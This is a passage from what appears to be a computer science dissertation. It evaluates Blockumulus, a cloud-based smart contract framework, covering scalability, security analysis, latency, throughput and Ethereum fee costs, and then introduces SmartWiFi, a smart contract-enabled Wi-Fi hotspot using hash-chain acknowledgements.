computation overhead can be represented as
$L_{compute} = K \cdot \sum_{i=1}^{N} C_i + M \cdot \sum_{i=1}^{N} C_i$, where $C_i$
is the amount of computation required for processing a single transaction $i$ on a single computer.
Since each computational load and the number of cells remain the same with a growing number of
transactions and users, we perform the following reduction:
$L_{compute} = K \cdot N \cdot c + c \cdot N \cdot c = O(KN)$.
Therefore, the compute overhead of Blockumulus has a linear dependency upon both the number
of users and the number of transactions, which suggests that the cells may need to proportionally
increase their compute power as the number of users grows. Since users are expected to pay for
Blockumulus access, the above requirement is unlikely to form a scalability bottleneck.
6.4.5: Snapshot Reporting
Each Blockumulus cell reports fingerprints to the smart contract with a constant frequency
$F = \frac{1}{\lambda}$. By representing the report timeline through $R$, the blockchain fee overhead is
as follows: $L_{fee} = M \cdot R \cdot F$. Since the number of cells $M$ is fixed, the fee does not change
over time, and the report frequency is also fixed, we have $L_{fee} = c \cdot c \cdot c = O(1)$.
Therefore, as a Blockumulus deployment grows, the fee overhead remains of the same order.
6.5: Security Analysis
Blockchain is a target of a wide range of security threats, from consensus-based attacks [216] to
social engineering attacks [158], and Blockumulus is not an exception. In this section, we scruti-
nize critical scenarios that pose security threats to a Blockumulus deployment, and we show how
Blockumulus addresses these challenges.


6.5.1: Double Spending
Double spending is a situation in which two mutually exclusive transactions are executed by
a distributed system, such as a repeated transfer of the same cryptocurrency balance. Consider a
situation in which Alice, who has 10 crypto coins, creates a transaction that sends 10 coins to Bob,
and another transaction with identical timestamp that sends 10 coins to Charlie. After that, Alice
simultaneously submits one of these transactions to Blockumulus through Cell 1, and another one
through Cell 2. Assume that the transaction storage of Blockumulus is properly implemented with
a mutex-based storage (i.e., the one that does not permit simultaneous writing operations), which
can be achieved through file locks or ACID databases. The two transactions will be saved in the
ledger in the order of their arrival. Subsequently, the transaction that is executed second will be
rejected, effectively preventing the double spending. Furthermore, Blockumulus transactions are
executed synchronously by all cells. Unlike blockchain, which allows a temporary partition into
peers that have already processed a transaction and peers that have not, Blockumulus prohibits
temporary asynchrony using the synchronous execution with a mutex-based storage. Therefore,
the situation where Bob received 10 coins from Alice according to one cell and Charlie received
10 coins according to another cell is impossible.
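The effect of a mutex-based storage can be demonstrated with a small Python sketch that replays the Alice, Bob, and Charlie scenario on a single ledger. The class Ledger is hypothetical, and threading.Lock stands in for the file locks or ACID database mentioned above.

```python
import threading


class Ledger:
    """Toy ledger whose writes are serialized by a mutex."""

    def __init__(self, balances):
        self.balances = dict(balances)
        self.lock = threading.Lock()
        self.log = []  # transactions in the order of their arrival

    def transfer(self, sender, recipient, amount):
        with self.lock:  # no two transfers can be applied simultaneously
            if self.balances.get(sender, 0) < amount:
                self.log.append((sender, recipient, amount, "rejected"))
                return False
            self.balances[sender] -= amount
            self.balances[recipient] = self.balances.get(recipient, 0) + amount
            self.log.append((sender, recipient, amount, "accepted"))
            return True


ledger = Ledger({"alice": 10})
results = []
threads = [
    threading.Thread(target=lambda r=r: results.append(ledger.transfer("alice", r, 10)))
    for r in ("bob", "charlie")
]
for t in threads:
    t.start()
for t in threads:
    t.join()
print(sorted(results))  # [False, True]: exactly one of the two transfers succeeds
```

Which of the two recipients is paid depends on the arrival order, but the second transfer is always rejected because the balance check and the update happen under the same lock.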
6.5.2: Transactions Filtering Attack
Blockumulus cells might prevent routing of a certain transaction to a bContract via a transactions
filtering attack. For example, consider a bContract that re-invests dividends if an investor fails to
withdraw them by a certain deadline. The business receiving the investment might bribe the cloud consortium
to filter out the withdrawal transaction — in which case the auditors will not be able to detect any
anomaly. In Blockumulus, we address this issue by enforcing the execution of a transaction via
the Ethereum smart contract. If a transaction is censored, it can be submitted directly to the smart
contract, and the system protocol stipulates the necessity to execute all transactions submitted in
this way. Since the smart contract is not under any party’s control, users have the ability to enforce
a transaction even when Blockumulus has only one operational cell.


6.5.3: Consortium Conspiracy
The cells might conspire to tamper with the snapshots in three possible ways: 1) by modifying an
existing transaction, 2) by removing an existing transaction, or 3) by injecting a new transaction.
If an existing transaction is modified, it will immediately break the verification of the transaction
signature generated by the sender. If an existing transaction is removed before the report is sub-
mitted to the smart contract, the receipt of this transaction signed by the cell becomes the proof of
malice by the cell. Finally, if a new transaction is added before the report, it is a legitimate way to
change data in the snapshot and does not need to be defended against. Another type of consortium
conspiracy is a system-wide subscription ban of a user by all Blockumulus providers. Fortunately,
this type of conspiracy can be easily prevented in the same way as in the case of transaction filter-
ing attack (see Section 6.5.2), i.e., by letting users submit contingency transactions to the Ethereum
smart contract.
6.5.4: Compromised Cells
An attacker might compromise one or several Blockumulus cells to skew the overlay consensus.
Let us consider the worst-case scenario, in which the attacker gained full access to the majority
of cells in a Blockumulus deployment to cause the Byzantine Fault event. In this case, a consen-
sus node cannot verify the true state of the system based on the testimonies from the other nodes.
However, Blockumulus is not prone to the Byzantine Fault scenario, because the Ethereum smart
contract, deployed on a Byzantine Fault Tolerant (BFT) blockchain, prevents the cells from deliv-
ering inconsistent testimonies to different parties.
6.6: Implementation and Evaluation
We implement the Blockumulus framework and evaluate its transaction latency, communication
overhead, transaction throughput, and operation cost. To account for different configurations, we test
the system performance with three different sizes of the cloud consortium: M = 2, M = 4, and
M = 8.


Figure 6.8: Transaction latency for FastMoney funds transfer with different sizes of cloud consortia,
based on 500 requests. Panels: (a) 2 cells, (b) 4 cells, (c) 8 cells.
6.6.1: Implementation
We implement the full stack of Blockumulus for evaluation and proof of concept. The Blockumulus
API is implemented using Web3.js 1.3.0 and node-rest-client 1.3.1. The Blockumulus core framework
is implemented using Node.js 10, Express 4.17, and Web3.js 1.3. We deploy 8 Blockumulus
cells on individual Ubuntu 20.04 servers in the Microsoft Azure cloud. Then, we implement the
Ethereum smart contract using Solidity 0.8.0, with the test deployment available on the Ropsten
network at 0x2F2980067A524a9A12C46354D62B8D769Ee119AB. The implementation includes 2553 lines
of code. To demonstrate the performance of Blockumulus, we implement a sample bContract called
FastMoney, which delivers a decentralized digital currency, using Python 3.6 and Web3.py 5.13 (for
fingerprinting). Then, we implement the user clients for FastMoney and CAS in JavaScript and
Web3.js, which are used for automated evaluation, as described below.
6.6.2: Test Setup
System Under Test: Our system under test (SUT) includes a set of cell deployments and an
Ethereum smart contract on the Ropsten testnet. For latency evaluation, we use Blockumulus cell
deployments with three different sizes of cloud consortia: N = 2, N = 4, and N = 8. For each
cell, we deploy an Azure B1ms instance with Ubuntu 20.04 LTS.
Test Harness: We use the Blockumulus API to create custom test clients with the additional
functionality of generating a random account for each request, which simulates different clients and
avoids potential caching of data related to a single account. Then, we deploy 8 client pools, each
an Azure Virtual Machine running Ubuntu 20.04 LTS, scattered across different geographic regions to
better simulate a real-world distribution of clients.
Evaluation Metrics: In this work, we measure transaction latency, communication overhead, trans-
action throughput, and operational cost of our prototype.
6.6.3: Transaction Latency
We evaluate the transaction latency of our Blockumulus deployment by measuring the time between
submitting a transaction and acquiring the receipt. We conduct two latency evaluation tests: the
distribution of delays of standalone transactions under normal load, and the transaction latency
under the load of a large number of simultaneous transactions.
    The results of the first experiment are shown in Fig. 6.8. In this experiment, we measure the
latency of funds transfers in the FastMoney bContract with cloud consortia of 2, 4, and 8 cells.
For each consortium size, we execute 500 consecutive transactions and measure their confirmation
delays. With 2 cells, 90% of transactions execute in under 2 seconds. When we double the size of
the consortium to 4 cells, the upper bound on the confirmation delay of 90% of transactions
increases by around 50%, i.e., more slowly than the number of cells. When we double the number of
cells again to 8, 90% of transactions finish in under 5 seconds, which is around 66% greater than
with 4 cells. Thus, the results indicate that transaction latency grows more slowly than the number
of cells.
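As a quick check of this growth argument, the following sketch compares latency growth with consortium growth. It uses rounded readings of the text rather than raw measurements: 2 s for 2 cells, 5 s for 8 cells, and an assumed 3 s for 4 cells (50% above the 2-cell bound). The function name is illustrative.

```python
# Approximate 90th-percentile confirmation delays (seconds) quoted in the text.
# The 4-cell value is an assumption: "around 50%" above the 2-second bound.
p90_delay = {2: 2.0, 4: 3.0, 8: 5.0}

def growth_factors(delays):
    """Return (cells, consortium growth, latency growth) per consecutive pair."""
    sizes = sorted(delays)
    rows = []
    for small, large in zip(sizes, sizes[1:]):
        rows.append((large, large / small, delays[large] / delays[small]))
    return rows

for cells, cell_growth, latency_growth in growth_factors(p90_delay):
    print(f"{cells} cells: consortium x{cell_growth:.2f}, latency x{latency_growth:.2f}")
```

In both doubling steps the latency factor stays below the factor of 2 by which the consortium grows.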
    In the second transaction latency measurement, we conduct a stress test with multiple
transactions issued at the same time. For this experiment, we use the CAS system bContract and run
9 experiments: 5,000, 10,000, and 20,000 transactions for each of the consortium sizes used
in the previous experiment, i.e., 2, 4, and 8 cells. As in the previous experiment, we observe
that in each configuration, as the number of transactions doubles, the transaction confirmation
time increases by a smaller factor.


Figure 6.9: Transaction latency for simultaneous CAS upload requests with different sizes of cloud
consortia. Panels: (a) 2 cells, (b) 4 cells, (c) 8 cells.
6.6.4: Communication Overhead
Table 6.2 shows the TCP overhead observed in Blockumulus while processing a transfer transaction
with the FastMoney bContract. To observe the communication between cells, we create a 2-cell
Blockumulus deployment on a local machine and run Wireshark, using its Follow TCP Stream function
to observe the cumulative traffic of each communication in each direction. The results show that,
in the worst case, the largest communication is around 4 Kbytes per transaction in the downlink
direction. A speed test using the Ookla software on several Azure servers revealed an available
bandwidth of around 8.5 Gbps in the downlink direction and around 1 Gbps in the uplink direction.
Since the overhead of a FastMoney transaction does not exceed about 4 Kbytes, a 1 Gbps link can
carry the data of more than 30,000 transactions per second, which exceeds the average throughput
of all credit card transactions in the world [1].
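The bandwidth bound can be reproduced with a few lines of arithmetic. This sketch takes the largest entry of Table 6.2 (4,135 bytes) as the per-transaction overhead and the lower of the two measured bandwidths (about 1 Gbps). It considers link capacity only and ignores processing time, so it is an upper bound rather than a throughput measurement.

```python
LINK_BITS_PER_SECOND = 1_000_000_000   # about 1 Gbps, the lower measured bandwidth
BYTES_PER_TRANSACTION = 4_135          # largest entry in Table 6.2 (about 4 Kbytes)

def max_transactions_per_second(bits_per_second, bytes_per_tx):
    """Upper bound on transactions per second imposed by link bandwidth alone."""
    return bits_per_second / 8 / bytes_per_tx

bound = max_transactions_per_second(LINK_BITS_PER_SECOND, BYTES_PER_TRANSACTION)
print(f"bandwidth-only bound: {bound:,.0f} transactions per second")
```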


Table 6.2: Communication overhead in FastMoney (bytes).

Communication (a)          2 cells          4 cells          8 cells
                          in     out       in     out       in     out
CL ↔ C: fingerprint    1,200     516    2,179     516    4,135     520
CL ↔ C: payment        1,140     559    2,059     559    3,895     563
CL ↔ C: forward          667     947      667     946      667     947

(a) CL ↔ C: between client and cell; C ↔ C: between two cells.
6.6.5: Transaction Throughput
For this evaluation, we transfer a small amount of funds from one FastMoney account to another
and measure the full delay between submitting the transaction and receiving the confirmation.
We do not generate any failing transactions, nor do we observe any failures during the stress test.
We run 9 experiments, matching three deployment configurations (2, 4, and 8 cells) with three sizes
of transaction load (5,000, 10,000, and 20,000 simultaneous transactions), with the results shown in
Fig. 6.10. The results demonstrate that increasing the number of cells reduces the transaction
throughput, whereas increasing the number of transactions raises it. The latter is expected
because, as shown earlier, the latency grows more slowly than the number of simultaneous
transactions. We attribute this “bulk discount” effect to the benefits of parallel execution,
caching, and a significant reserve of available bandwidth due to the low communication overhead of
Blockumulus.
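The link between sublinear latency growth and rising throughput can be stated compactly. The notation here is introduced only for illustration and is not part of the evaluation: $n$ is the number of simultaneous transactions, $L(n)$ is the time needed to confirm all of them, and $\theta(n)$ is the resulting throughput.

```latex
\[
\theta(n) = \frac{n}{L(n)}, \qquad
L(2n) < 2\,L(n) \;\Longrightarrow\;
\theta(2n) = \frac{2n}{L(2n)} > \frac{2n}{2\,L(n)} = \theta(n).
\]
```

In words, whenever doubling the load less than doubles the confirmation time, the throughput at the doubled load is strictly higher.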
6.6.6: Operational Cost
Blockumulus delivers transaction performance similar to that of credit card providers, alongside the
decentralization properties seen in cryptocurrencies such as Bitcoin. This reconciliation of
performance and decentralization comes at the price of delayed final settlement of transactions.
Specifically, any confirmed transaction hinges upon trust in the cells until the corresponding
snapshot is submitted to the Ethereum smart contract. Therefore, the frequency of snapshot reports
defines the speed of final irreversible settlement of recent transaction sets in Blockumulus.
Table 6.3 shows how much each participating cloud pays in Ethereum fees per 24 hours for data
validation, depending on the frequency of the reports. Depending on the projected user participation
and other goals of the Blockumulus deployment, the consortium can balance the cost and frequency of
reports. For comparison, the average price per Ethereum transaction on January 13, 2021 was $5.72 [4],
with approximately 1,000 daily transactions [5]. With the same number of daily transactions, the
Blockumulus fee overhead per transaction would be 218.08/1000 = $0.218 with a 10-minute report
period, which is about 26 times less than in Ethereum. Moreover, the more subscribers a
Blockumulus cell has, the less money is required per user to cover the reporting fee. For example,
if a Blockumulus cell has 10,000 active subscribers, the monthly reporting fee overhead per user
would be only $0.65. We do not add the cost of auditing to the overall cost because cross-auditing
is already a part of normal cell operation, and third-party auditing does not incur any expense for
Blockumulus cell operators.

Figure 6.10: Transaction throughput in Blockumulus.
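The cost figures in this section follow from simple arithmetic, sketched here. Two assumptions are made: the gas consumed by a single report is taken to be the 24-hour entry of Table 6.3 (one report per day), and a month is taken to be 30 days. The dollar amount is copied from the table rather than recomputed from gas and Ether prices, and the function names are illustrative.

```python
GAS_PER_REPORT = 49_193        # Table 6.3: daily gas with one report every 24 hours
USD_PER_DAY_10_MIN = 218.08    # Table 6.3: daily cost with 10-minute reports

def daily_gas(report_period_minutes):
    """Gas spent per cloud provider in 24 hours for a given report period."""
    reports_per_day = (24 * 60) // report_period_minutes
    return reports_per_day * GAS_PER_REPORT

def fee_per_transaction(daily_cost_usd, daily_transactions):
    """Reporting-fee overhead attributed to each transaction."""
    return daily_cost_usd / daily_transactions

def monthly_fee_per_user(daily_cost_usd, subscribers, days=30):
    """Reporting-fee overhead per subscriber over a month (30 days assumed)."""
    return daily_cost_usd * days / subscribers

for minutes in (10, 30, 60, 480, 1440):
    print(f"{minutes:>5} min: {daily_gas(minutes):>9,} gas per day")
print(f"per transaction: ${fee_per_transaction(USD_PER_DAY_10_MIN, 1_000):.3f}")
print(f"per user per month: ${monthly_fee_per_user(USD_PER_DAY_10_MIN, 10_000):.2f}")
```

The gas values reproduce the Gas column of Table 6.3, and the last two lines reproduce the $0.218 and $0.65 figures quoted in this section.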
Table 6.3: Cost of Blockumulus smart contract fees for participating cloud services based on the
report period.

Report period     Cost per 24 hours per cloud provider
                  Gas             Approx. USD (a)
10 min            7,083,792       218.08
30 min            2,361,264        72.69
1 hour            1,180,632        36.35
8 hours             147,579         4.54
24 hours             49,193         1.51

(a) With the market price of Ether $733 and gas price 22 GWei.

6.7: Chapter Summary
We propose Blockumulus, the first scalable framework for deploying decentralized smart contracts
on the cloud, to address the blockchain scalability limitations on three dimensions: transaction
throughput, data storage, and computation. The core idea of Blockumulus is to exploit a novel
overlay consensus which delivers decentralization to smart contracts in a centralized cloud instead
of random P2P network nodes. Concretely, a consortium of centralized cloud computing nodes can
host a permissionless smart contract environment where clients can control the execution of their
customized contracts and manage the data stored by these contracts. Our evaluation on Microsoft
Azure shows that Blockumulus can execute tens of thousands of transactions within a minute, which
is on par with the average throughput of worldwide credit card transactions. By integrating the
decentralization of smart contracts and the scalability feature of the cloud, Blockumulus takes the
first step towards high-performance data-rich smart contracts with high transaction throughput.


CHAPTER 7: DECENTRALIZED NETWORK OF WI-FI HOTSPOTS⁵³
7.1: Introduction
The number of mobile Internet users has been steadily increasing, corroborating a pressing need
for reliable wireless connectivity to be available everywhere, all the time. As opposed to cellular
communications, WiFi provides a low-cost solution for wireless Internet access with a miniature
infrastructure [99]. During the past two decades, WiFi has become the de facto standard for wireless
local area networks (WLAN) and Internet-of-Things (IoT) [211].
     The WiFi technology has been used to create hotspots that offer Internet access to users in their
proximity. WiFi hotspots are typically seen in venues such as airports, cafes, and hotels. Private
hotspots are often configured in enterprise, personal, and household networks to serve a limited
number of WiFi-enabled devices. Both public and private hotspots often require authentication and/or
payment. Two or more hotspots belong to the same authentication domain if they share the same
authentication server and, if applicable, the same payment server. Although a number of technologies
have been introduced for cross-domain authentication, such as Passpoint [12] and eduroam [2],
WiFi hotspots are still partitioned into a multitude of incompatible domains, which makes seamless
WiFi roaming infeasible. In this work, we introduce a practical solution for a universal (i.e.,
cross-domain) and decentralized hotspot network, which addresses the domain partitioning problem.
Ultimately, we envision a fully automated cross-domain authentication between wireless APs
provided by different businesses and private owners, forming a global permissionless decentralized
network of free and paid hotspots. However, in order to achieve this goal, a number of shortcomings
of existing hotspots must be addressed.

  ⁵³ This chapter is based on previously published work by Nikolay Ivanov, Jianzhi Lou and Qiben Yan titled
“SmartWiFi: Universal and Secure Smart Contract-Enabled WiFi Hotspot” published at the Security and Privacy in
Communication Networks. SecureComm 2020. Lecture Notes of the Institute for Computer Sciences, Social Informatics
and Telecommunications Engineering, vol 335. Springer, Cham. DOI: 10.1007/978-3-030-63086-7_23 [159].
Reproduced with permission from Springer Nature.

Motivation: Despite its obvious benefits and popularity, the current WiFi hotspot technology expe-
riences significant shortcomings: M1: Security: Public WiFi often eliminates password protection
or conveys the passwords insecurely. M2: Unreliable performance: The speed of a WiFi hotspot
largely depends on several unpredictable factors, such as the number of connected users or the
bandwidth consumption of each individual user. Moreover, the hotspot owners generally have no
incentive for upgrading hardware and service. M3: Limited access: Traditional WiFi hotspots do
not offer a universal service for everyone. To be associated with a hotspot service, a user should
be ascribed to a certain role or affiliation. The users’ access to the service hinges upon their
particular subscriptions. M4: Cumbersome procedure or high infrastructure cost: Connecting to a WiFi
hotspot often requires extensive manual effort, such as searching for an SSID, entering payment
details, and specifying authentication settings. Although WLAN direct IP access and 3GPP IP access
enable easy configuration, they both rely on a costly cellular authentication infrastructure.
     In this research, we envision that transferring the point of centralized trust from hotspot and/or
client to a decentralized independent party, i.e., blockchain, enhances security of the connection
and payment while simplifying the configuration procedure (to address M1). SmartWiFi hotspot
establishes the dependency between the Quality of Service (QoS) and payment, which creates an in-
centive for hotspot owners to deliver a high QoS (to address M2). The proposed hotspot technology
is universal and accessible, i.e., it serves all clients who have means to pay, while also supporting
unrestricted free WiFi hotspots (to address M3). The simplified configuration procedures offer a
full automation of handshake, connection control, and checkout using the enforced execution of
smart contract protocols without relying on complex server-based or cloud authentication infras-
tructure (to address M4).
Key Challenges: Designing a universal smart contract-enabled WiFi hotspot involves three major
challenges. First, blockchain execution incurs significant processing delays, rendering the execu-
tion of many operations impossible within reasonable time limits. Second, blockchain offers very
limited data storage. Third, blockchain networks charge considerable fees for executing block-
modifying operations, e.g., payment transactions, smart contract deployments, smart contract state
transitions, etc.
      In this work, we present SmartWiFi, the first operational smart contract-enabled WiFi hotspot
with automated cross-domain authentication. SmartWiFi leverages a novel off-chain protocol
called Hash Chain-based Network Connectivity Satisfaction Acknowledgement (Hansa⁵⁴) to manage
a secure and reliable connection. An off-chain protocol establishes communication between
two entities using blockchain, but executes without any interaction with blockchain, which allows
Hansa to enable a fast, low-cost, and low-overhead provider-client interaction with significant re-
duction of blockchain delays and fees. In addition, we present DupSet, a Dynamic User-Perceived
Speed Estimation Technique, which reliably estimates the speed of Internet connection for client-
side QoS control. Leveraging these novel techniques, we design and implement SmartWiFi desktop
and mobile apps using a smart contract executed by an Ethereum Virtual Machine (EVM). A video
demonstration of the SmartWiFi app is available at https://youtu.be/jrDl204fGso.
      This work makes the following main contributions.
      • Protocol Design: To build SmartWiFi, we propose Hansa, a novel cryptographic scheme
         that provides cross-domain authentication and establishes a smart contract-enabled off-chain
         session arrangement for a hotspot and a client. It provides a fast and low-cost smart contract
         execution by restricting blockchain transaction delays and fees. We also design DupSet to
         quantify the QoS of Internet access provided by SmartWiFi hotspots to clients. DupSet allows
         SmartWiFi clients to perform low-overhead bandwidth estimation to measure the quality of
         Internet connection.
      • System Implementation: We implement operational prototypes of SmartWiFi router and
         client that use Ethereum blockchain as a smart contract platform. Both components are
         cross-platform, hardware-agnostic, and can be easily deployed into existing infrastructure.
         In addition, we implement a fully-functional SmartWiFi Android app, demonstrating the
         feasibility of deploying SmartWiFi on non-rooted mobile platforms.
      • Experimental Evaluation: We rigorously evaluate the delays, blockchain fees, and
         communication overhead of SmartWiFi on Ropsten and Mainnet Ethereum networks. We also
         scrutinize the DupSet technique by juxtaposing its measurements with the results from nine
         popular bandwidth measurement services. Furthermore, we evaluate the scalability of SmartWiFi
         by demonstrating the stability of the system under the load of more than 100 simultaneous
         client processes connected to a single SmartWiFi router.

   ⁵⁴ The name is inspired by the Hansa Trade League, which successfully operated under the power of mutual trust for
over a century in a turbulent political and economic environment of Medieval Europe.

7.2: Background and Key Insights
7.2.1: Blockchain and Smart Contracts
Formally, blockchain is a distributed abstract data structure (ADS) represented by a list of objects
(blocks), which are cryptographically linked in such a way that a modification of any block would
require a chain recalculation (validation) of all subsequent blocks in the list. Consequently, any
block-modifying operation, except append, incurs considerable execution time. The
block validation speed is deliberately throttled in the proof-of-work (PoW) consensus protocol
employed by Ethereum, Bitcoin, and some other blockchains, making retrospective modifications
of these blockchains nearly impossible. Practically, the term blockchain is used to refer to one
of many peer-to-peer (P2P) networks that store, synchronize, and cross-validate their respective
blockchain data structures. A smart contract is a distributed deterministic application, deployed
on blockchain, and individually executed by the blockchain participants, with any associated data
and results being part of the consensus. Therefore, smart contracts can establish, execute, and
unequivocally enforce protocols and agreements between parties.
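The linking property described in this section can be illustrated with a toy hash-linked list. This is a minimal sketch under simplifying assumptions (SHA-256, byte-string payloads, an all-zero genesis value, no consensus or proof-of-work), not the block format of Ethereum or any other blockchain. The function names are illustrative.

```python
import hashlib

GENESIS = b"\x00" * 32  # fixed starting value (assumption for this sketch)

def block_hash(prev_hash, payload):
    """Hash of a block: binds the payload to the hash of the previous block."""
    return hashlib.sha256(prev_hash + payload).digest()

def build_chain(payloads):
    """Return a list of (payload, hash) pairs, each linked to its predecessor."""
    chain, prev = [], GENESIS
    for payload in payloads:
        prev = block_hash(prev, payload)
        chain.append((payload, prev))
    return chain

def first_invalid_block(chain):
    """Index of the first block whose stored hash no longer matches, or None."""
    prev = GENESIS
    for index, (payload, stored) in enumerate(chain):
        if block_hash(prev, payload) != stored:
            return index
        prev = stored
    return None

chain = build_chain([b"tx-a", b"tx-b", b"tx-c", b"tx-d"])
assert first_invalid_block(chain) is None

# Tamper with block 1 without recomputing anything: validation fails there.
chain[1] = (b"tx-b-forged", chain[1][1])
print(first_invalid_block(chain))  # 1

# Recomputing only the forged block's hash moves the mismatch to the next block.
chain[1] = (b"tx-b-forged", block_hash(chain[0][1], b"tx-b-forged"))
print(first_invalid_block(chain))  # 2
```

The second step shows why a modification forces recalculation of every subsequent block: repairing one link breaks the next one.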
7.2.2: Threat Model
We consider a threat model with both malicious clients and malicious hotspots. Malicious clients
would attempt to obtain Internet access without payment, which is regarded as a free-rider attack.
They could also try to cause significant performance degradation or a complete shutdown of the
hotspot. Malicious hotspots, on the other hand, aim to get payment from the clients without
providing sufficient QoS.
    We assume that hotspots and clients have no knowledge regarding their respective identities,
and they have no pre-established trust. Moreover, the blockchain, smart contract, and its underlying
cryptography are considered secure and trusted by hotspots and clients, i.e., we do not consider a
wide range of attacks towards blockchain [69] and smart contracts [271].
7.2.3: Overview of Key Insights
Recognizing the shortcomings of existing WiFi hotspots, we bring forth a set of key insights that
lead to the design of SmartWiFi.
Off-Chain Interaction: High delays and fees in blockchain networks make it impossible to query
the blockchain frequently for trust renewal. The idea of off-chain interaction, in which a smart
contract is used by two or more parties as a guarantor of a protocol, but not as an executor of this
protocol, has been proposed for fast and cheap payments [111, 232]. We extend this idea to WiFi
hotspots by limiting the blockchain interaction to only handshake (session initiation) and payment
resolution (session conclusion).
Cryptographic Satisfaction Acknowledgement: One of the key design goals of SmartWiFi is
to develop a protocol that would deliver a tamper-proof testimony of Internet usage time to the
smart contract. The traditional approach is based on connection time and data size measurements
performed by the provider itself, which relies on the assumption of its trustworthiness. However, a
more comprehensive Internet traffic accounting is needed to ensure proper mutual agreement and
non-repudiation. We design such a scheme using periodic cryptographically verifiable
acknowledgements sent by the client to the hotspot. Each subsequent acknowledgement attests to the
client’s satisfaction with the quality of the Internet connection during the short period of time
since the previous acknowledgement, which we call a session unit. Each acknowledgement can be
cryptographically verified by the smart contract and exchanged for funds reserved in the contract.
Hash Chain Data Compression: Storing every cryptographically verifiable acknowledgement in the
smart contract would incur fees and consume computational time. Our key insight is to represent the
set of acknowledgements by a hash chain, which can be generated from one random seed, so that the
verification of each acknowledgement only requires the head of the hash chain. Therefore, the smart
contract only needs to store one hash value, i.e., the hash chain head, to verify a series of
acknowledgements. We use a hash chain-based arrangement instead of signatures to eliminate the need
for the client to use its private key constantly, which makes SmartWiFi a safer option for
unattended IoT devices.
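The hash chain idea can be sketched in a few lines. The example assumes SHA-256 as the hash function and a 32-byte random seed, neither of which is specified in this section. The function names and the 60-link length are likewise illustrative.

```python
import hashlib
import os

def H(value):
    """One hash-chain step (SHA-256 is an assumption of this sketch)."""
    return hashlib.sha256(value).digest()

def generate_chain(seed, length):
    """Return [Y_0, Y_1, ..., Y_length], where Y_0 = seed and Y_k = H(Y_{k-1})."""
    chain = [seed]
    for _ in range(length):
        chain.append(H(chain[-1]))
    return chain

def steps_to_head(ack, head, max_steps):
    """Hash `ack` forward until it reaches `head`.

    Returns the number of hash steps needed, or None if `ack` does not lead
    to `head` within `max_steps` steps (i.e., it is not on the chain).
    """
    current = ack
    for steps in range(max_steps + 1):
        if current == head:
            return steps
        current = H(current)
    return None

seed = os.urandom(32)              # secret, kept by the client
chain = generate_chain(seed, 60)   # 60 links below the head
head = chain[-1]                   # the only value a verifier needs to store

print(steps_to_head(chain[-4], head, 60))        # 3
print(steps_to_head(os.urandom(32), head, 60))   # None
```

A verifier that stores only `head` can thus check any released link, while producing an unreleased link would require inverting the hash function.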
Dynamic Speed Measurement: The satisfaction acknowledgement-based protocol stipulates that
the client evaluates whether the Internet connection is satisfactory prior to sending an
acknowledgement. Aiming for a fully-automated solution, we quantify the quality of the Internet connection
using a dynamic speed measurement technique. Existing bandwidth estimation approaches require
the transfer of a large amount of data, while we aim for frequent, fast, and low-overhead speed
probes. Here, we simulate Internet activities using a set of HTTP servers deployed globally. The
concept of measuring the speed of delivering an average web page, rather than consuming the
available bandwidth, creates the possibility for frequent and low-overhead speed probes emulating
actual user experience.
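To make the idea of a page-delivery speed probe concrete, the following sketch times the download of a small page and aggregates several samples. It is not the DupSet algorithm: the use of the median, the threshold, and all function names are hypothetical choices made for illustration. The offline samples at the end are made-up numbers.

```python
import statistics
import time
import urllib.request

def probe(url, timeout=5.0):
    """Fetch one page; return (bytes received, elapsed seconds)."""
    start = time.monotonic()
    with urllib.request.urlopen(url, timeout=timeout) as response:
        body = response.read()
    return len(body), time.monotonic() - start

def perceived_speed_kbps(samples):
    """Median delivery speed over (bytes, seconds) samples, in kilobits per second."""
    speeds = [size * 8 / 1000 / seconds for size, seconds in samples if seconds > 0]
    return statistics.median(speeds) if speeds else 0.0

def is_satisfactory(samples, minimum_kbps):
    """Decide whether the client should release the next acknowledgement."""
    return perceived_speed_kbps(samples) >= minimum_kbps

# Offline example with made-up samples: (page size in bytes, seconds to deliver).
samples = [(200_000, 0.8), (180_000, 0.6), (220_000, 1.1)]
print(perceived_speed_kbps(samples), is_satisfactory(samples, 1_000))
```

In a live setting, `probe` would be called against several servers and its results passed to `is_satisfactory`. Each probe transfers only one page, which keeps the overhead low compared with saturating the link.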
7.3: The SmartWiFi System
In this section, we present the design of the SmartWiFi system. Unlike traditional WiFi hotspots,
SmartWiFi is a universal infrastructure that supports cross-domain authentication, i.e., anyone can
use SmartWiFi as a client or as a hotspot, while the smart contracts authenticate the users by their
Ethereum account (generated offline and stored by the user). In this work, we use Ethereum as the
target platform due to its relative maturity and wide popularity. Fig. 7.1 depicts the basic building
blocks of the SmartWiFi system, which consists of six major components: SmartWiFi router, the
router’s Ethereum wallet, the hotspot managed by the router, the client, the client’s Ethereum wallet,
and the smart contract.
Figure 7.1: SmartWiFi workflow. ① an Internet-connected device (router) provides SmartWiFi
hotspot service; ② the client connects to the hotspot and sends it a hash chain head and its public
address; ③ router provides a grace-period Internet access to the client and stores the public address
in the smart contract; ④ client funds the smart contract; ⑤ router activates unrestricted Internet
access for the client; ⑥ client periodically sends the router satisfaction acknowledgements (links
of hash chain); ⑦ router claims payment from the smart contract using the last acknowledgement;
⑧ client is refunded by smart contract. The dashed lines represent the Hansa protocol communications.
Diagram components: SmartWiFi Hotspot (Internet-connected device with digital wallet, WiFi hotspot),
SmartWiFi Client (client with digital wallet), and Ethereum Smart Contracts.

    SmartWiFi is enabled by three main ingredients: the Hansa protocol, the DupSet speed measurement,
and the smart contract. The Hansa protocol establishes and maintains an Internet connection,
and it includes two major sessions: handshake and service. Payment and refund are processed after
the client-router connection terminates. While handshake, payment, and refund require interaction
with blockchain, the service session is executed off-chain. DupSet is a speed measurement technique
that allows the clients to quantify their QoS satisfaction and continuously monitor the Internet
access quality of SmartWiFi. The smart contract is designed to process the payment and refund.
7.3.1: SmartWiFi Setup
SmartWiFi uses a smart contract to serve as an intermediate trust layer to hold/release the payment
and enforce fair behavior between the router and the client. SmartWiFi also uses the router’s firewall
policy to control the clients’ access privilege. The hotspot initiates SmartWiFi service after the
router performs the following steps: (1) SmartWiFi router deploys several reusable smart contracts,
the number of which equals the maximum number of concurrently-served clients; (2) the router
establishes a two-way communication channel with every user; (3) the router activates a default
firewall policy that allows every client to have a restricted access to required services, such as the
blockchain API. We define the service period as the period the client is connected to the Internet
via a SmartWiFi router, and the service unit as the minimum service period that the client will be
charged for.
7.3.2: Hansa Handshake Session
In the Hansa handshake session, the router and the client establish a relationship regulated and
protected by the smart contract. The Hansa protocol begins when the client connects to the hotspot and
establishes a TCP connection with the SmartWiFi router. The router replies with a greeting message,
